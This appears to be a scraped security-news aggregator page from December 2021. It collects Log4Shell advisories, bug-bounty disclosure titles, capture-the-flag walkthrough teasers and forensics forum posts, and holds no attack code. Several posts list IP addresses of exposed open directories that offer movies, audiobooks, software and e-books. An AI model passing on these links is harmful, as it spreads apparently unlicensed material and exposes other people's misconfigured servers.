    By now, you’ve probably learned of Apache Log4j 2. As reported across the web, there is the recently disclosed CVE-2021-44228 vulnerability in Apache Log4j 2 (widely referred to as Log4Shell) affecting organizations far and wide. This is a critical vulnerability in Apache Log4j 2, impacting versions from 2.0-beta9 to 2.14.1. And now you’ve likely been asking, “Where is this vulnerability within my own IT ecosystem, and how do I mitigate it if necessary?” Flexera is helping work through the issue with our customers by ensuring immediate visibility of the impact of this and other vulnerabilities within their IT estate. Flexera…
  • Open

    SPEL表达式注入漏洞深入分析
    1.SPEL简介 SPEL(Spring Expression Language),即Spring表达式语言,是比JSP的EL更强大的一种表达式语言。从Spring 3开始引入了Spring表达式语言,它能够以一种强大而简洁的方式将值装配到Bean属性和构造器参数中,在这个过程中所使用的表达式会在运行时计算得到值。使用SPEL你可以实现超乎想象的装配效果,这是其他装配技术很难做到的。 2.SPEL使用 SPEL的使用可以分为两种方式,第一种是在注解中进行使用,另一种是通过SPEL组件提供的接口来进行解析。 在注解中使用的情况 [crayon-6267516abea5d324216616/] [crayon-6267516abea63900761633/] [crayon-6267516abea66553667827/]   通过接口的使用情况 [crayon-6267516abea68349082736/] 这段代码是执行一段简单的SPEL表达式“3*3”,最终执行结果如下所示 SPEL表达式还能执行一些更复杂的命令,例如对一个对象进行操作,代码如下所示,首先是一个pojo类 [crayon-6267516abea6a485480686/] 然后是通过SPEL表达式操作user对象的属性 [crayon-6267516abea6d768482282/] 可以操作对象的属性SPEL同样也可以操作对象的方法,例如我们的pojo类User中就有一个成员方法sayHi,和一个静态方法sayBye,我们使用SPEL表达式来分别调用一下 首先是调用成员方法,也就是动态方法 [crayon-6267516abea70576622283/] 运行结果如下 然后是调用静态方法,代码如下所示 [crayon-62…
  • Open

    Extract sms messages from Google Backup? Cellebrite failed on Android/Samsung
    I've tried using Cellebrite Cloud to extract messages from a Google drive Android backup (Android sends Google backups to Google Drive). It failed to parse after running several tests using my own device. I also tried to access my Samsung backup which includes messages. Celkebrite Cloud failed to login at all. Has anyone had any success accessing or extracting sms from Android Google backups or Samsung backups? It's unfortunate when tools provide that service yet fail to perform. submitted by /u/zero-skill-samus [link] [comments]  ( 2 min )

  • Open

    CHFI 2021 Exam Review
    As some of you may know, CHFI is considered to be the base line of computer forensics certifications which is why I thought that buying a test and course from EC-Council would be the place to start. I will lay out the topics that I was NOT expecting to get tested on. Let me preface by saying that there is NO one study guide out there that will prepare you for your test. You will hear people saying "I didn't study and still passed/I studied for two weeks and passed." Unless, you've worked as a SOC Analyst or have 2 years of prior computer forensics, you will fail. I began studying in January of this year and took the test in October. I failed with a 57%. While you need a 75%~ to pass, there are things the EC-Council test prep package did NOT prepare me for and the only reason why I got…  ( 4 min )
    SUMURI RECON ITR now has the ability to physically image M1, M1 Max, and M1 Pro Mac computer
    submitted by /u/acw750 [link] [comments]  ( 1 min )
    Detecting RAID parameters for rebuild
    Hi all, I have 3 E01 raid discs from a QNAP device, which i try to rebuild. X-ways , OS forenics and mdadm don't recognize the raid parameters automatically. So the day is finally come to learn more about raid.... Is here somebody who can point me out to some good reading on how to extract these parameters from the discs? Thanks in advance! submitted by /u/Lizzy4235 [link] [comments]  ( 1 min )
  • Open

    Google storage bucket takeover which is used to load JS file in dashboard.html in "github.com/kubernetes/release" which can lead to XSS
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398706 - Bounty: $100
    Race Condition Vulnerability when creating profiles
    Showmax disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1428690
    Able to access private picture/video/writing when requesting for their JSON response
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1424291 - Bounty: $250
    Broken Link Takeover from kubernetes.io docs
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398572 - Bounty: $100
    Broken Github Link Used in deployment docs of "github.com/kubernetes/kompose"
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398617 - Bounty: $100
  • Open

    digital world.local: FALL Vulnhub Walkthrough
    FALL (digitalworld.local: FALL) is a medium level machine created by Donavan for Vulnhub. This lab is appropriate for some experienced CTF players who wish to The post digital world.local: FALL Vulnhub Walkthrough appeared first on Hacking Articles.  ( 5 min )
    Thales1 Vulnhub Walkthrough
    “Thales” is a Capture the Flag challenge available on Vulnhub. MachineBoy deserves credit for developing this box. In this box, we will learn how to The post Thales1 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    digital world.local: FALL Vulnhub Walkthrough
    FALL (digitalworld.local: FALL) is a medium level machine created by Donavan for Vulnhub. This lab is appropriate for some experienced CTF players who wish to The post digital world.local: FALL Vulnhub Walkthrough appeared first on Hacking Articles.  ( 5 min )
    Thales1 Vulnhub Walkthrough
    “Thales” is a Capture the Flag challenge available on Vulnhub. MachineBoy deserves credit for developing this box. In this box, we will learn how to The post Thales1 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Forgiveness
    I forgive you for your first lies. I forgive myself for believing into it. Continue reading on Medium »  ( 1 min )
  • Open

    Mitigating the Log4Shell vulnerability (CVE-2021-44228) on DietPi
    Article URL: https://dietpi.com/blog/?p=1172 Comments URL: https://news.ycombinator.com/item?id=29581625 Points: 2 # Comments: 0  ( 5 min )
    Securing K8s clusters for Log4j CVE-2021-44228
    Article URL: https://github.com/kubearmor/log4j-CVE-2021-44228 Comments URL: https://news.ycombinator.com/item?id=29573520 Points: 1 # Comments: 0  ( 7 min )
  • Open

    Old programs for WIN & MAC (Office 95, Encarta, iLife, etc) and ISOs
    Aux francais mostly http://145.239.62.120/download_center/repos/Applications/ http://145.239.62.120/download_center/repos/ISOs/ submitted by /u/SexRevolutionnow [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-16 Review
    Log4j2远程代码执行漏洞检测和防护策略研究 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-16 Review
    Log4j2远程代码执行漏洞检测和防护策略研究 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Nighthawk 0.1 - New Beginnings - @MDSecLabs
    submitted by /u/dmchell [link] [comments]  ( 1 min )
  • Open

    Apache Shiro 反序列化漏洞原理详解
    Apache shiro简介 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 本文针对Shiro进行了一个原理性的讲解,从源码层面来分析了Shiro的认证和授权的整个流程,并在认证与授权的这个流程讲解冲,穿插说明rememberme的作用,以及为何该字段会导致反序列化漏洞。 Apache shiro认证 在该小节中我们将会详细讲解Shiro是如何认证一个用户为合法用户的 Shiro漏洞环境测试代码修改自Vulhub中的CVE-2016-4437。 首先是Shiro的配置文件,代码如下所示 [crayon-6267516ac05d9874385250/] 然后是Controller的代码 [crayon-6267516ac05e1997931430/] 最后是Realm [crayon-6267516ac05e4512920183/] 这里来看一下自定义的MainRealm的类继承和实现关系图 Realm所起到的作用通常是获取后台用户的相关信息,然后获取前端传递进来的用户信息,将二者封装好然后交由shiro进行认证比对从而判断用户是否为合法用户,然后在用户访问后台资源时,为用户授予指定好的权限。 那么认证是怎么认证的呢?下面来从Shiro源码的角度来进行详细的分析。 首先是登陆页面,和登陆页面的代码。 当点击Singn in按钮的时候 后台对应的Controller就会执行 但是在执行到Controller之前,Shiro会进行一个操作,如下所示 首先就是Shiro的Filter,在Shiro的配置文件中,通过@…
    从零到一带你深入 log4j2 Jndi RCE CVE-2021-44228漏洞
    0x01前言 最近IT圈被爆出的log4j2漏洞闹的沸沸扬扬,log4j2作为一个优秀的java程序日志监控组件,被应用在了各种各样的衍生框架中,同时也是作为目前java全生态中的基础组件之一,这类组件一旦崩塌将造成不可估量的影响。从Apache Log4j2 漏洞影响面查询的统计来看,影响多达60644个开源软件,涉及相关版本软件包更是达到了321094个。而本次漏洞的触发方式简单,利用成本极低,可以说是一场java生态的‘浩劫’。本文将从零到一带你深入了解log4j2漏洞。知其所以然,方可深刻理解、有的放矢。 0x02 Java日志体系 要了解认识log4j2,就不得讲讲java的日志体系,在最早的2001年之前,java是不存在日志库的,打印日志均通过System.out和System.err来进行,缺点也显而易见,列举如下: 大量IO操作; 无法合理控制输出,并且输出内容不能保存,需要盯守; 无法定制日志格式,不能细粒度显示; 在2001年,软件开发者Ceki Gulcu设计出了一套日志库也就是log4j(注意这里没有2)。后来log4j成为了Apache的项目,作者也加入了Apache组织。这里有一个小插曲,Apache组织建议过sun公司在标准库中引入log4j,但是sun公司可能有自己的小心思,所以就拒绝了建议并在JDK1.4中推出了自己的借鉴版本JUL(Java Util Logging)。不过功能还是不如Log4j强大。使用范围也很小。 由于出现了两个日志库,为了方便开发者进行选择使用,Apache推出了日志门面JCL(Jakarta Commons Logging)。它提供了一个日志抽象层,在运行时动态的绑定日志实现组件来工作(如log4j、java.util.logging)。导入哪个就绑定哪个,不需要…

  • Open

    Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    My road map !! Need help
    This isy roadmap to be a red teamer Is anything need to change 1- learn programming ---python ---C/C++ 2-Networking and OS ---Linux ---IT and Networking Basics ---THM Pre security path 3-Web Security ---THM Web fundamentals path ---OWASP TOP 10 Guide 4-Hacking Basics ---THM Complete beginner path ---INE PTS Course ---THM jr penetration tester path 5- Doing CTFs ---THM ---Hack the box ---Velnhub 6-The OSCP 7-Red team Certs ---pentester academy CRTP ---pentester academy CRTE ---Offensive security OSCE ---NOTES--- I am a computer science student I have learned C++ and python scripting And linux command line submitted by /u/Ok_Attempt_3411 [link] [comments]  ( 2 min )
    Guys, does anyone knows anything about 7asecurity.com course content?
    Guys, does anyone knows anything about 7asecurity.com course content? submitted by /u/Select_Plane_1073 [link] [comments]  ( 1 min )
  • Open

    Windows Credential Manager for hackers
    Windows can store credentials for easy reuse. There are several ways to access them. Continue reading on System Weakness »  ( 3 min )
    Runas for hackers
    Please, refer to the post on Credential Manager if you are interested in seeing how to manage stored credentials in windows. This will be… Continue reading on System Weakness »  ( 4 min )
    HackMyVM — Twisted
    Writeup (Español) Continue reading on Medium »  ( 2 min )
  • Open

    Hot-patch CVE-2021-44228 by exploiting the vulnerability itself
    Article URL: https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch Comments URL: https://news.ycombinator.com/item?id=29571694 Points: 1 # Comments: 0  ( 1 min )
    Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE)
    Article URL: https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/ Comments URL: https://news.ycombinator.com/item?id=29569587 Points: 2 # Comments: 0  ( 10 min )
    Protection against CVE-2021-45046, the additional Log4j RCE vulnerability
    Article URL: https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29568125 Points: 3 # Comments: 0
    Log4j Vulnerability (CVE-2021-44228)
    Article URL: https://github.com/NCSC-NL/log4shell Comments URL: https://news.ycombinator.com/item?id=29563247 Points: 2 # Comments: 0  ( 3 min )
    Google Chrome Zero Day CVE-2021-4102, Use after free in V8
    Article URL: https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html Comments URL: https://news.ycombinator.com/item?id=29561740 Points: 82 # Comments: 27  ( 6 min )
  • Open

    Weak rate limit could lead to ATO due to weak password protection mechanisms
    Reddit disclosed a bug submitted by bombon: https://hackerone.com/reports/1065186 - Bounty: $100
    No rate limit on password reset leads to email enumeration at gateway-production.dubsmash.com
    Reddit disclosed a bug submitted by cracker922: https://hackerone.com/reports/1425884
    Untitled
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/584582 - Bounty: $500
    reflected xss in e.mail.ru
    Mail.ru disclosed a bug submitted by seifelsallamy: https://hackerone.com/reports/1379297 - Bounty: $1000
  • Open

    A collection of gifs
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-15 Review
    《软件分析》完整版课程视频 by ourren 从Log4shell事件看资产风险运营工程化的困局与盲点 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-15 Review
    《软件分析》完整版课程视频 by ourren 从Log4shell事件看资产风险运营工程化的困局与盲点 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Intro to Bitcoin investigation and wallet seizure - types of wallets, seeds, keys, and transactions
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
  • Open

    A TL;DR technical explanation of the log4j vulnerability
    submitted by /u/sn1pr0s [link] [comments]  ( 1 min )
  • Open

    【安全通报】微软12月漏洞补丁日修复多个高危漏洞
    近日,微软发布 12 月份安全补丁,共修复了 67 个针对微软产品的CVE漏洞,其中 7个严重漏洞,60个高危漏洞。涉及 Windows 和 Windows 组件、ASP.NET Core 和 Vis...  ( 2 min )
  • Open

    【安全通报】微软12月漏洞补丁日修复多个高危漏洞
    近日,微软发布 12 月份安全补丁,共修复了 67 个针对微软产品的CVE漏洞,其中 7个严重漏洞,60个高危漏洞。涉及 Windows 和 Windows 组件、ASP.NET Core 和 Vis...  ( 2 min )

  • Open

    CISA Log4j (CVE-2021-44228) Vulnerability Guidance
    Article URL: https://github.com/cisagov/log4j-affected-db Comments URL: https://news.ycombinator.com/item?id=29559856 Points: 24 # Comments: 0  ( 2 min )
    CVE in Apache Log4j 2.15.0 was incomplete in certain non-default configurations
    Article URL: https://www.cve.org/CVERecord?id=CVE-2021-45046 Comments URL: https://news.ycombinator.com/item?id=29558106 Points: 2 # Comments: 0
    Separate Log4j DOS Vulnerability – CVE-2021-45046
    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046 Comments URL: https://news.ycombinator.com/item?id=29556414 Points: 2 # Comments: 0  ( 2 min )
    CVE-2021-4102: RCE in Chromium actively being exploited
    Article URL: https://security.archlinux.org/CVE-2021-4102 Comments URL: https://news.ycombinator.com/item?id=29555514 Points: 9 # Comments: 0
    CVE-2021-45046: Apache Log4j2 2.16.0 is out
    Article URL: https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f Comments URL: https://news.ycombinator.com/item?id=29554725 Points: 10 # Comments: 1
  • Open

    Windows Privilege Escalation: Scheduled Task/Job (T1573.005)
    An attacker may exploit the Windows Task Scheduler to schedule malicious programmes for initial or recurrent execution. For persistence purposes, an attacker may utilise Windows The post Windows Privilege Escalation: Scheduled Task/Job (T1573.005) appeared first on Hacking Articles.  ( 6 min )
    DarkHole: 2 Vulnhub Walkthrough
    DarkHole: 2 is a medium-hard machine created by Jihad Alqurashi for Vulnhub. This system is also put through its paces in VirtualBox. This lab is The post DarkHole: 2 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Windows Privilege Escalation: Scheduled Task/Job (T1573.005)
    An attacker may exploit the Windows Task Scheduler to schedule malicious programmes for initial or recurrent execution. For persistence purposes, an attacker may utilise Windows The post Windows Privilege Escalation: Scheduled Task/Job (T1573.005) appeared first on Hacking Articles.  ( 6 min )
    DarkHole: 2 Vulnhub Walkthrough
    DarkHole: 2 is a medium-hard machine created by Jihad Alqurashi for Vulnhub. This system is also put through its paces in VirtualBox. This lab is The post DarkHole: 2 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Levels of Fuzzing (2013)
    Article URL: https://blog.regehr.org/archives/1039 Comments URL: https://news.ycombinator.com/item?id=29556976 Points: 2 # Comments: 0  ( 9 min )
  • Open

    Tips for DFIR Analysts, pt VI
    Context & Finding Persistence I was looking into an unusual mechanism for launching applications recently, and that research brought back a recurring issue I've seen time and again in the industry, specifically pivoting from one data point to another based on knowledge of the underlying system. Very often, during SOC monitoring or live response, we'll find a process executing via EDR telemetry (or some other means) and have no clear understanding of the mechanism that launched that process. Sometimes, we may have the data available to assist us in discovering the root cause of the process launch; for example, in the case of processes launched via web shell, all you need to do is trace backward through the process tree until you get to the web server process (i.e., w3wp.exe, etc.). Other ti…  ( 6 min )
  • Open

    Any good tools for forensic analyzing a MariaDB?
    Dear community, What would you use to analyze a MariaDB forensically? I found https://github.com/pr4xx/db-forensic-framework on GitHub but would like to hear what you are using? Anything helps, thank you submitted by /u/Civil-Lion-4602 [link] [comments]  ( 1 min )
    I'm currently studying to transition from a SIEM administrator to a network forensics analyst. What's are good workflows/resources for analyzing PCAPs?
    Hey community, 24 years old SIEM administrator who's currently self-studying to become a network forensics analyst. I'm reading books/watching youtube videos/doing some SANS and Chris Sanders courses but I want to hear from the subreddit - what's a good workflow or some tips when starting to analyze PCAPS? I have a lab with Brim, Suricata, and Snort that I play with. Assuming I'm tasked with analyzing a PCAP that is related to an incident of some sort, what would be good pointers and procedures to follow? what would be things that I would want to look for, and how do I find them? Thanks in advance! submitted by /u/HeliosHype [link] [comments]  ( 2 min )
    Are books in the FAQ still relevant?
    Some of them are from 2009 to 2013. Can anyone suggest more recent books? Or are those books still the best? Also what CTF website do you recommend specified for digital forensics ? submitted by /u/NinjaShmurtle [link] [comments]  ( 2 min )
    Recommendations for Targeted Diff Searches
    I’m looking to cross reference forensic data dumps from two different devices. Are there any tools (preferably open source) that can compare file contents between two different folders and print matching values? submitted by /u/keeny-fn-pawers [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-14 Review
    浅谈被动式IAST产品与技术实现 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2021-12-14 Review
    浅谈被动式IAST产品与技术实现 by ourren 更多最新文章,请访问SecWiki
  • Open

    Gaining access to a network with Office macros — Pentesting and red teaming
    Explaining the usage of malicious Office macros to gain access to a target’s network as a red teamer. Continue reading on Medium »  ( 3 min )
  • Open

    Am I getting ghosted by MITRE ?
    Hello there, I sent a request for some CVEs last week (on Thursday) to MITRE - CNA, for some bugs that I found in an open-source project, the bugs have been aknowledged by the vendor and patched. It's Tuesday today and aside from the automated email right after the request they didn't come back to me. Is this normal? Does it take usually that long ? submitted by /u/Glum_Gur2093 [link] [comments]  ( 1 min )
  • Open

    Zero day path traversal vulnerability in Grafana 8.x allows unauthenticated arbitrary local file read
    Aiven Ltd disclosed a bug submitted by j0v: https://hackerone.com/reports/1415820 - Bounty: $1000
    Universal Cross-Site Scripting vulnerability
    Proctorio disclosed a bug submitted by sector7-nl: https://hackerone.com/reports/1326264
  • Open

    Audiobooks, podcasts & tutti quanti
    http://120.29.58.149:8888/Audiobooks/ http://51.198.90.160/resources/AudioBooks/ http://173.208.202.90:8080/audiobooks/Martin%2C%20George%20R.%20R.%20-%20A%20Clash%20of%20Kings http://27.32.91.221/Audiobooks/ (Movies, TV shows and music in other dirs) http://www.vicenet.org/book/Lifespan%20Why%20We%20Age%20-%20and%20Why%20We%20Don't%20Have%20To/ http://67.82.39.229:88/DandD/Audio/Chris%20Perkins%20DM/ (including D&D stuff) http://winnow.veeshanvault.org/files/Audio/ Podcasts: http://teknosophy.com/episodes/ German podcasts on OSS: http://159.69.132.234/ submitted by /u/krazybug [link] [comments]  ( 2 min )
    WikiLeaks - Can Anyone Confirm New Data Dumped Tonight?
    submitted by /u/Aphix [link] [comments]

  • Open

    [dubsmash] Username and password bruteforce
    Reddit disclosed a bug submitted by asce21: https://hackerone.com/reports/1165225 - Bounty: $100
    com.reddit.frontpage vulernable to Task Hijacking (aka StrandHogg Attack)
    Reddit disclosed a bug submitted by nexus2k: https://hackerone.com/reports/1325649
    [dubsmash] Long String in 'shoutout' Parameter Leading Internal server Error on Popular hastags , Community and User Profile
    Reddit disclosed a bug submitted by sandeep_rj49: https://hackerone.com/reports/1237428 - Bounty: $1000
    No Rate limit on change password leads to account takeover
    Reddit disclosed a bug submitted by dreamispossible: https://hackerone.com/reports/1165285
    Vulnerabilities in exported activity WebView
    Shipt disclosed a bug submitted by shell_c0de: https://hackerone.com/reports/414101 - Bounty: $350
    Error Page Content Spoofing or Text Injection
    Judge.me disclosed a bug submitted by tefa_: https://hackerone.com/reports/1421413
  • Open

    Through the years..Movies,TV, Software, etc...
    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
    Christmas movies and other Christmas stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    The first list contains mostly PDF and EPUB files. The second is a list of questionable/unexplored/interesting directories.
    Plus an appreciation repost for this post about Calishot and the terabytes of data being hosted. Adding NSFW flare for the unexplored directories, and for the nature of https://ihatefeds.com ‘s content. PDFs: https://lira.epac.to/DOCS-TECH/Security/ https://lira.epac.to/DOCS-TECH/ https://www.miralishahidi.ir/resources/ https://www.kgay4all.com/seioqueseiporleroqueleio/ https://theswissbay.ch/pdf/ http://index-of.es http://s28.bitdl.ir/?C=N&O=A -(edit)-a lot of files with the same size and overall feels a bit sus. Proceed with extra caution. https://ihatefeds.com http://www.aetkin.com/files/Real%20Analysis%20Qual%20Study%20Questions/ http://mis.kp.ac.rw/admin/admin_panel/kp_lms/files/digital/ http://incompleteideas.net/book/ Questionable directories https://ebook-mecca.com/ebooks/?SA http://47.219.34.42:8081/Files/ -(edit)-I think he’s dead, Jim. https://docs.spring.io/spring-amqp/docs/ https://docs.jboss.org/weld/reference/ https://www.scons.org/doc/ https://www.unicode.org/Public/ https://www.unicode.org/Public/UCD/latest/charts/ https://ftp.rush.edu/users/molebio/ https://www.nsula.edu/documentprovider/docs/ https://spdf.gsfc.nasa.gov/pub/software/cdf/doc/ https://bannerwitcoff.com/wp-content/uploads/ https://www.uvm.edu/~swac/docs/ http://ftp.axis.com • https://www.orfeo-toolbox.org/packages/ci/CookBook/ Directory- https://www.orfeo-toolbox.org/packages/ci/ submitted by /u/Ok_Strawberry7053 [link] [comments]
  • Open

    Seal HackTheBox Walkthrough
    Seal is a CTF Linux machine rated as medium difficulty on Hack the Box platform. So let get started and deep dive into breaking down The post Seal HackTheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    Seal HackTheBox Walkthrough
    Seal is a CTF Linux machine rated as medium difficulty on Hack the Box platform. So let get started and deep dive into breaking down The post Seal HackTheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    Imaging Software
    What freeware beside Paladin do you use for imaging after booting? Any suggestions? submitted by /u/Civil_Structure_1033 [link] [comments]  ( 1 min )
    Diavol Ransomware
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

    Why Log4Shell could be the worst software vulnerability ever
    Thousands of Java applications across the world are wide open to remote code execution attacks targeting the Log4j library. This post summarizes what we know so far about the Log4Shell vulnerability, how you can mitigate it, how to find it using Netsparker, and what it means for cybersecurity here and now. READ MORE  ( 5 min )
  • Open

    Finding the log4j RCE With Fuzzing
    Article URL: https://www.code-intelligence.com/blog/java-fuzzing-log4j-rce Comments URL: https://news.ycombinator.com/item?id=29541779 Points: 1 # Comments: 1  ( 1 min )
  • Open

    SecWiki News 2021-12-13 Review
    SecWiki周刊(第406期) by ourren 从一例挖矿木马看 Log4Shell 的在野传播 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2021-12-13 Review
    SecWiki周刊(第406期) by ourren 从一例挖矿木马看 Log4Shell 的在野传播 by Avenger 更多最新文章,请访问SecWiki
  • Open

    【安全通报】Apache Log4j2 远程代码执行漏洞
    近日,网络上出现 Apache Log4j2 远程代码执行漏洞。攻击者可利用该漏洞构造特殊的数据请求包,最终触发远程代码执行。由于该漏洞影响范围极广,建议广大用户及...  ( 4 min )
  • Open

    【安全通报】Apache Log4j2 远程代码执行漏洞
    近日,网络上出现 Apache Log4j2 远程代码执行漏洞。攻击者可利用该漏洞构造特殊的数据请求包,最终触发远程代码执行。由于该漏洞影响范围极广,建议广大用户及...  ( 4 min )
  • Open

    Can we find Log4Shell with Java Fuzzing? 🔥 (CVE-2021-44228 - Log4j RCE)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Monitoring events through the OSINT system to ensure the information security of the organization
    Today OSINT (Open Source Intelligence) term is used in different aspects. Continue reading on Medium »  ( 5 min )
  • Open

    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Coinmonks »  ( 2 min )
    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Medium »  ( 2 min )
  • Open

    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Coinmonks »  ( 2 min )
    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Medium »  ( 2 min )
  • Open

    如何使用 X.XYZ 铸造和交易您的 NFT
    x.xyz是一个几乎零gas的NFT交易平台,X运行在fantom网络上,所以 Continue reading on Medium »  ( 2 min )

  • Open

    Private OOB 테스팅을 위한 Self Hosted Interactsh
    이번 주말은 log4shell로 인해 정말 인터넷이 불타고 있습니다. 자 이제 보안담당자들은 이를 대응하고 자산에 대해 스캐닝을 진행하게 될텐데, 여기서 식별에 사용하는 대표적인 방법인 OOB(Out-Of-Band)를 알려진 서비스들(ZAP OAST, Burpsuite collaborator, Interactsh 등)을 이용하여 편하게 테스팅할 수 있겠지만, 이는 결국 외부에 callback이 발생한 서버의 IP가 남게되고, 이를 통해서 해당 서비스를 운영하는 운영하는 회사 또는 그룹 등 정보를 얻어갈 수 있는 구간이 존재하게 됩니다. (썩 좋은 그림은 아니죠) 그래서 오늘은 Private하게 OOB를 테스트할 수 있도록 VPC와 DNS Glue Record를 이용하여 interactsh 서버를 따로 구축하고 사용하는 방법에 대해 이야기할까 합니다.
  • Open

    HackMyVM — Furious
    Writeup (Español) Continue reading on Medium »  ( 3 min )
  • Open

    Finding a deleted file without having a file name
    tldr; need to find a file that may or may not have been on 3 separate windows PCs. only definitive info i have is the file itself, which is a pdf of a scanned document. file was deleted 2019 and removed from recycle bin. hey all not sure where to start here, hoping someone can point me in the right direction. ive got a pdf file of a scanned document. that is all i know about the file. not sure if the name would have been changed, if it was originally a .docx, nothing. my first question is how to find it if it isnt deleted? i opened it up in notepad, grabbed a unique string from the file and then searched using 'Everything' (voidtools) but it was hit or miss as to if it found it 2nd question is how to find it if it was deleted. the file dates back to 2019 and these computers are used on a daily basis, so im not very hopeful the data wouldnt have been overwritten by now. ​ thanks in advnace submitted by /u/mat7688 [link] [comments]  ( 2 min )
    Biggest dreams in the field?
    Something a little different. What do you hope to accomplish in your career? Opening up your own firm? New research? I am just curious. submitted by /u/FAlady [link] [comments]  ( 1 min )
    Mobile phone and MacOS forensic tools
    I’m going to be attending SANS DFIR netwars and I’m confident everywhere except smartphones and macOS. I know we’ll be given apple hfs/apfs and iOS and android acquisitions which I’m not sure how to even approach. So was wondering if anybody had some good resources on how to tackle them submitted by /u/KennethsFreq [link] [comments]  ( 1 min )
  • Open

    A galore of animated movies, series and anime to prepare your Christmas time in family
    http://109.120.203.163/lvm/animation%20and%20puppets/ http://185.141.213.228/Animation/ https://185.107.32.136/Animation/ http://tajmovie.ir/Animation/ https://dl1.zflix.ir/Animation/ https://dl3.5fghhui78jnkopqwccgo2hellru6.xyz/Animation/ https://dl1.fastmovie.ir/Movie/Animation/ https://dl5.5fghhui78jnkopqwccgo2hellru6.xyz/Animation/ http://46.4.39.111/--KIDS-SERIES/ Anime: http://75.86.210.23/archive/ANIMU/ http://neet.rehab/anime/ == https://149.28.180.59/anime/ http://51.158.151.61:8080/Animoos/ http://148.251.73.149/Anime&Manga/ http://149.28.180.59/anime/ http://149.28.180.59/anime/ http://509.rbx.abcvg.ovh/ submitted by /u/krazybug [link] [comments]  ( 4 min )
  • Open

    Exploit samAccountName spoofing with Kerberos
    submitted by /u/dmchell [link] [comments]
  • Open

    add class vulnerable Stored XSS
    Mail.ru disclosed a bug submitted by mrirfan__07: https://hackerone.com/reports/1215179

  • Open

    Chronos Vulnhub Walkthrough
    Chronos is an easy/medium machine from Vulnhub by AL1ENUM. This machine is also tested in VirtualBox. This lab is suitable for novices because it has The post Chronos Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Chronos Vulnhub Walkthrough
    Chronos is an easy/medium machine from Vulnhub by AL1ENUM. This machine is also tested in VirtualBox. This lab is suitable for novices because it has The post Chronos Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    RXSS - http://macademy.mtnonline.com
    MTN Group disclosed a bug submitted by 0xelkomy: https://hackerone.com/reports/1091165
    Missing captcha and rate limit protection in help form
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1165223
    [BrakTooth] Bluetooth vulnerability allows attacker to disconnect or deny reconnection to BT devices connected to a target. Attack #1
    Intel Corporation disclosed a bug submitted by matheus_garbelini: https://hackerone.com/reports/1397601 - Bounty: $3000
    [BrakTooth] Bluetooth vulnerability allows attacker to disconnect or deny reconnection to BT devices connected to a target. Attack #2
    Intel Corporation disclosed a bug submitted by matheus_garbelini: https://hackerone.com/reports/1397602 - Bounty: $3000
  • Open

    Log4shell 전 세계의 인터넷이 불타고 있습니다 🔥 (CVE-2021-44228/CVE-2021-45046/CVE-2021-45105)
    네 바로 어제(2021-12-10) Java의 logging package인 log4j2 에서 RCE 0-day 취약점이 공개되었습니다. Service, Application에 로그를 쌓을수만 있다면 어떤 환경에서도 공격 가능성이 존재하고, 리스크가 RCE인 만큼 정말 전 세계가 불타오르고 있네요. (하하 DM도 터져나갑니다. 안볼거에요……) 일이 우선이니 어제는 대응에 집중하고, 하루 늦은 오늘 글로 공유하려고 합니다. 어디가… 사실 아직 끝난게 아니야… 이후에도 추가건인 CVE-2021-45046과 CVE-2021-45105로 대응해야 할 것들이 더 있어서 최초 공개인 금요일부터 그 다음주까진 정신없이 보냈던 것 같습니다. 아무튼 모든 Security engineer와 Developer, DevOps 등 이 사건으로 고생하신 모든 분들께 경의를 표합니다 👏🏼
    웹 해커를 위한 Browser Addons
